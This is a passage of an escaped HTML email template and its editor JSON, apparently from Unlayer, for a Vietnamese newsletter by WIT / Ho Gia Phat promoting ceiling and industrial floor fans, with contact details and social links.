style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 44px 22px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 190%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%; text-align: center;\\\">Vi\\u1ec7c ki\\u1ec3m so\\u00e1t lu\\u1ed3ng kh\\u00f4ng kh\\u00ed, ho\\u1ea1t \\u0111\\u1ed9ng b\\u1ec1n b\\u1ec9, kh\\u00f4ng ti\\u1ebfng \\u1ed3n - qu\\u1ea1t tr\\u1ea7n v\\u00e0 qu\\u1ea1t th\\u1ed5i s\\u00e0n l\\u1edbn tr\\u1edf th\\u00e0nh xu h\\u01b0\\u1edbng nhi\\u1ec1u gia \\u0111\\u00ecnh Vi\\u1ec7t Nam hi\\u1ec7n nay. Ngo\\u00e0i ra, vi\\u1ec7c s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd t\\u1ea1o gi\\u00f3 t\\u1ef1 nhi\\u00ean v\\u00e0 th\\u00f4ng tho\\u00e1ng \\u0111\\u1ed1i l\\u01b0u kh\\u00f4ng kh\\u00ed ph\\u00e2n b\\u1ed5 \\u0111\\u1ed3ng \\u0111\\u1ec1u c\\u00e1c m\\u00f9a quanh n\\u0103m, ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n c\\u1ef1c k\\u1ef3 hi\\u1ec7u qu\\u1ea3 th\\u1eddi gian s\\u1eed d\\u1ee5ng li\\u00ean t\\u1ee5c. Th\\u00eam v\\u00e0o \\u0111\\u00f3, \\u0111\\u1ec3 th\\u1ed5i s\\u00e0n ho\\u1eb7c mu\\u1ed1n c\\u00f3 lu\\u1ed3ng gi\\u00f3 th\\u1ed5i c\\u00f3 h\\u01b0\\u1edbng m\\u1ea1nh trong m\\u1ed9t kh\\u00f4ng gian l\\u1edbn th\\u00ec \\u0111\\u00e3 c\\u00f3 qu\\u1ea1t th\\u1ed5i s\\u00e0n c\\u00f4ng nghi\\u1ec7p. L\\u00fac n\\u00e0y b\\u1ea1n c\\u00f3 nhi\\u1ec1u l\\u1ef1a ch\\u1ecdn ki\\u1ec3u d\\u00e1ng qu\\u1ea1t l\\u00e0m m\\u00e1t t\\u1eeb nh\\u00e0 cung c\\u1ea5p WIT - \\u0111\\u01a1n v\\u1ecb cung c\\u1ea5p qu\\u1ea1t ch\\u1ea5t l\\u01b0\\u1ee3ng cao nh\\u1eadp kh\\u1ea9u t\\u1eeb USA, Taiwan<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"\\\" style=\\\"height:47px; v-text-anchor:middle; width:519px;\\\" arcsize=\\\"87%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#54c5cd\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Open Sans\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Open Sans\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #54c5cd; border-radius: 41px;-webkit-border-radius: 41px; -moz-border-radius: 41px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:15px 33px;line-height:120%;\\\"><strong>H\\u00c3Y \\u0110\\u1ec2 L\\u1ea0I TH\\u00d4NG TIN, CH\\u00daNG T\\u00d4I S\\u1ebc LI\\u00caN H\\u1ec6 T\\u01af V\\u1ea4N GI\\u00daP B\\u1ea0N<\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:13px 44px 22px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"line-height: 190%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 190%; text-align: center;\\\"><span style=\\\"font-size: 18px; line-height: 34.2px;\\\">Talk to you soon.<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #262c46;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #262c46;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 15px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%; text-align: center;\\\"><strong><span style=\\\"font-family: \'Open Sans\', sans-serif; font-size: 28px; line-height: 39.2px;\\\">Get In Touch<\\/span><\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 25px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #e4e4eb; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">Talk to us 0913123860 or\\u00a0<br \\/>Email us: sale@hogiaphat.vn<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 30px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div align=\\\"center\\\">\\r\\n  <div style=\\\"display: table; max-width:259px;\\\">\\r\\n  <!--[if (mso)|(IE)]><table width=\\\"259\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"border-collapse:collapse;\\\" align=\\\"center\\\"><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"border-collapse:collapse; mso-table-lspace: 0pt;mso-table-rspace: 0pt; width:259px;\\\"><tr><![endif]-->\\r\\n  \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 20px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 20px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/facebook.com\\/hgpco\\\" title=\\\"Facebook\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/facebook.png\\\" alt=\\\"Facebook\\\" title=\\\"Facebook\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 20px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 20px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/twitter.com\\/hogiaphatco\\\" title=\\\"Twitter\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/twitter.png\\\" alt=\\\"Twitter\\\" title=\\\"Twitter\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 20px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 20px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/whatsapp.com\\/hogiaphatco\\\" title=\\\"WhatsApp\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/whatsapp.png\\\" alt=\\\"WhatsApp\\\" title=\\\"WhatsApp\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 20px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 20px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/pinterest.com\\/hogiaphatco\\\" title=\\\"Pinterest\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/pinterest.png\\\" alt=\\\"Pinterest\\\" title=\\\"Pinterest\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    <!--[if (mso)|(IE)]><td width=\\\"32\\\" style=\\\"width:32px; padding-right: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n    <table align=\\\"left\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"0\\\" width=\\\"32\\\" height=\\\"32\\\" style=\\\"width: 32px !important;height: 32px !important;display: inline-block;border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;margin-right: 0px\\\">\\r\\n      <tbody><tr style=\\\"vertical-align: top\\\"><td align=\\\"left\\\" valign=\\\"middle\\\" style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n        <a href=\\\"https:\\/\\/youtube.com\\/hgpco\\\" title=\\\"YouTube\\\" target=\\\"_blank\\\">\\r\\n          <img src=\\\"https:\\/\\/cdn.tools.unlayer.com\\/social\\/icons\\/circle-white\\/youtube.png\\\" alt=\\\"YouTube\\\" title=\\\"YouTube\\\" width=\\\"32\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: block !important;border: none;height: auto;float: none;max-width: 32px !important\\\">\\r\\n        <\\/a>\\r\\n      <\\/td><\\/tr>\\r\\n    <\\/tbody><\\/table>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n    \\r\\n    \\r\\n    <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #1d3361;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #1d3361;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:12px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%; text-align: center;\\\">\\u00a9 WIT Company. All Rights Reserved<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n    <!--[if (mso)|(IE)]><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n  <\\/tbody>\\r\\n  <\\/table>\\r\\n  <!--[if mso]><\\/div><![endif]-->\\r\\n  <!--[if IE]><\\/div><![endif]-->\\r\\n<\\/body>\\r\\n\\r\\n<\\/html>\\r\\n\"', '\"{\\\"counters\\\":{\\\"u_row\\\":10,\\\"u_column\\\":14,\\\"u_content_text\\\":30,\\\"u_content_image\\\":10,\\\"u_content_button\\\":1,\\\"u_content_social\\\":2,\\\"u_content_divider\\\":5,\\\"u_content_heading\\\":5},\\\"body\\\":{\\\"id\\\":\\\"UmVb3KA4Xy\\\",\\\"rows\\\":[{\\\"id\\\":\\\"5MgZae-Tgg\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"7w1rPghIyp\\\",\\\"contents\\\":[{\\\"id\\\":\\\"JJFvhlnT_y\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"22px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1676879143752-LOGO-HA.png\\\",\\\"width\\\":1063,\\\"height\\\":525,\\\"maxWidth\\\":\\\"49%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_1\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_1\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_1\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"-bOhuFx8md\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"TsQkk5SEgo\\\",\\\"contents\\\":[{\\\"id\\\":\\\"6rCUuP3Anm\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"44px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Raleway\\\",\\\"value\\\":\\\"\'Raleway\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Raleway:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"60px\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">THI\\u1ebeT K\\u1ebe - T\\u01af V\\u1ea4N - CUNG C\\u1ea4P<\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M M\\u00c1T<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#236fa1\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1676879443906-1250.jpg\\\",\\\"fullWidth\\\":false,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\",\\\"width\\\":1250,\\\"height\\\":450,\\\"customPosition\\\":[\\\"50%\\\",\\\"50%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"nrSzXypjKi\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"CvjCDJjkzY\\\",\\\"contents\\\":[{\\\"id\\\":\\\"Co_usn-ATn\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"35px 44px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#34495e\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_18\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 22px; line-height: 30.8px;\\\\\\\">Dear Name,<\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"iwVbyx9tfH\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h1\\\",\\\"fontSize\\\":\\\"22px\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_1\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"THI\\u1ebeT K\\u1ebe T\\u01af V\\u1ea4N GI\\u1ea2I PH\\u00c1P QU\\u1ea0T L\\u00c0M 